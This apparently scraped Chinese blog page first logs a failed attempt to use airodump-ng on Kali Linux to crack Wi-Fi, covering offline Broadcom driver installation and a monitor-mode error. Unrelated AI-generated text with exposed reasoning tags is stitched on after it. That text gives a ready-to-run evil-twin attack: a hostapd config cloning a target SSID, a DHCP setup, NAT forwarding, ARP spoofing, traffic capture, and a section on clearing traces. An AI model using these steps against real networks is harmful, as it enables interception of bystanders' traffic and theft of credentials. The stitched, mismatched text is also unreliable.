记:kali使用airodump-ng出错的问题记录

博主尝试在kali linux系统破解wifi密码,因虚拟机无法使用物理机无线网卡,改用U盘挂载系统。进入系统后发现未装无线驱动,介绍了离线安装驱动方法。监听无线网口时出现问题,强制开启monitor模式失败,最终得出需购买外置USB无线网卡的结论。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

kali使用airodump-ng出错的问题记录

最近想入坑渗透(其实纯粹瞎弄的),安装kali linux 系统这个功能强大的黑客系统,试着破解wifi密码(慎:仅限于实验)。

想法:

  1. 想在虚拟机上安装kali linux 系统,但虚拟机不能直接使用物理机(笔记本)的无线网卡。
  2. 于是想着使用u盘挂载kali linux 系统。

做法:

  1. 使用USB启动盘制作工具 rufus软件,制作u盘启动文件。
    链接:https://pan.baidu.com/s/17oEGJ5AYurcP_sMe0D9Ehw
    提取码:w8t

  2. 进入kali 系统后,发现没有装笔记本的无线驱动。

  3. 离线安装无线驱动

    使用lspci 查看本笔记本的pcie 挂载的设备,可看到无线网卡的设备信息(是博通的芯片 Broadcom)。

在这里插入图片描述

安装无线网卡驱动:

① 在有线网的情况下,可以使用以下命令安装:

apt install broadcom-sta-dkms

②如果没有网时,可使用以上命令,看需要安装什么安装包。

可以看到需要两个安装包:dkms和Broadcom-sta-dkms 。

在这里插入图片描述
在有网的电脑下,到kali.org 提示的路径下找到这两个安装包,并下载导入到kali 系统中。

安装deb离线包:

dpkg -i dkms_2.6.1-4_all.deb
dpkg -i broadcom-sta-dkms_6.30.223.271-10_all.deb

ifconfig 可以看到已经可以使用无线网口了。

监听无线网口

首先使用以下命令kill 所有与无线网口相关的进程(不关闭的话,可能造成start 的步骤失败)。

airmon-ng check kill all

使用以下命令开启监视

airmon-ng start wlan0

无线网口抓包

airodump-ng wlan0

然而到了这步,出现无线网不支持,2333333。
在这里插入图片描述
强制开启monitor

使用iwconfig 命令,查看网口的状态,看到mode 为managed,没有变为monitor。

使用以下命令强制开启monitor。

iwconfig wlan0 mode monitor 

提示error,显示这台笔记本自带的无线网口,不能监视。

在这里插入图片描述

看来需要买一个外置usb无线网卡了。。。

2点了。。。。休息睡觉觉~~~~

<think>好的,用户想在Ubuntu 18.04上完成邪恶双胞胎攻击的实验。我需要详细思考整个过程的步骤,同时确保技术细节的准确性。 首先,用户可能需要了解邪恶双胞胎攻击的基本概念。这涉及到创建一个与合法Wi-Fi热点同名的恶意接入点,诱使用户连接,从而进行中间人攻击或数据窃取。不过,用户可能已经知道这一点,所以重点应该放在具体实施步骤上。 接下来,需要考虑Ubuntu 18.04下的工具选择。常用的工具包括hostapd创建热点,dnsmasq或isc-dhcp-server分配IP,以及aircrack-ng套件中的airmon-ngairodump-ng进行无线监控。需要确认这些工具在18.04中的可用性,可能涉及安装过程。 然后是具体步骤。首先需要检查无线网卡是否支持监听模式,这通常需要兼容的网卡,比如某些型号的TP-Link或Alfa网卡。用户可能需要安装驱动,但这一步如果网卡已经支持,可以省略。然后启用监听模式,使用airmon-ng启动监控接口,比如wlan0mon。 扫描附近的Wi-Fi网络,找到目标AP的信息,包括SSID、BSSID、信道等。这里可能需要使用airodump-ng进行扫描。之后,创建恶意AP,配置hostapd的配置文件,设置相同的SSID和信道,同时启动DHCP服务分配IP地址。这一步需要确保网络接口的正确配置,比如将wlan0或另一个接口设置为AP模式,并正确设置IP地址和NAT转发。 启用IP转发和配置iptables规则是关键步骤,确保流量通过攻击者的机器,便于进行数据捕获或中间人攻击。用户可能需要设置NAT规则,将客户端的流量转发到真实网络,或者进行拦截。 最后是数据捕获,使用tcpdump或Wireshark抓包,分析敏感信息。用户可能还想进行进一步的攻击,如SSL剥离或DNS欺骗,这需要额外的工具和配置。 需要注意的是,用户可能是在学习网络安全,进行合法授权的测试。必须提醒法律和道德问题,强调未经授权的攻击是非法的。此外,步骤中可能遇到的问题,比如驱动不兼容、服务冲突等,需要给出解决建议,比如使用Kali Linux预装工具,或者处理进程干扰。 最后,生成相关问题时,要考虑用户可能的后续疑问,比如防御措施、检测方法、法律后果,以及更复杂的攻击手法。这些能帮助用户深入理解该主题,并扩展知识面。 总结步骤时,要分点清晰,确保命令准确,配置文件的示例正确,避免用户操作时出错。同时,引用相关工具和概念时,可能需要添加脚注,但根据用户提供的示例,引用标识应放在段落末尾,如[^1]。</think>在Ubuntu 18.04系统中实现邪恶双胞胎攻击需要无线网卡支持监听模式和合法授权测试环境。以下是具体步骤: --- ### 一、准备工作 1. **硬件要求** - 支持监听模式的无线网卡(如RTL8812AU芯片设备) - 执行`iw list`查看网卡是否支持`AP`和`monitor`模式 2. **安装工具** ```bash sudo apt update sudo apt install hostapd dnsmasq aircrack-ng iptables wireshark ``` --- ### 二、实施步骤 #### 1. 启用监听模式 ```bash sudo airmon-ng check kill # 结束可能冲突的进程 sudo airmon-ng start wlan0 # 启动监听模式(接口名可能为wlan0mon) ``` #### 2. 扫描目标网络 ```bash sudo airodump-ng wlan0mon ``` 记录目标AP的`BSSID`、`信道(CH)`和`SSID` #### 3. 创建恶意AP **配置文件`hostapd.conf`**: ```ini interface=wlan0 driver=nl80211 ssid=目标SSID # 与合法AP同名 hw_mode=g channel=目标信道 macaddr_acl=0 ignore_broadcast_ssid=0 ``` **启动AP**: ```bash sudo hostapd hostapd.conf ``` #### 4. 配置DHCP服务 **修改`/etc/dnsmasq.conf`**: ```ini interface=wlan0 dhcp-range=192.168.1.100,192.168.1.200,255.255.255.0,12h ``` **启动服务**: ```bash sudo systemctl restart dnsmasq ``` #### 5. 设置流量转发 ```bash sudo sysctl net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # eth0为连接互联网的接口 ``` --- ### 三、中间人攻击 1. **ARP欺骗**(需目标已连接恶意AP): ```bash sudo arpspoof -i wlan0 -t 目标IP 网关IP ``` 2. **数据捕获**: ```bash sudo tcpdump -i wlan0 -w capture.pcap ``` --- ### 四、清理痕迹 ```bash sudo airmon-ng stop wlan0mon sudo systemctl stop dnsmasq sudo sysctl net.ipv4.ip_forward=0 ``` --- ### 注意事项 - 实验需在授权环境中进行[^1] - 实际成功率受信号强度、客户端安全策略影响 - 现代Wi-Fi安全协议(如WPA3)会显著增加攻击难度[^2]
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值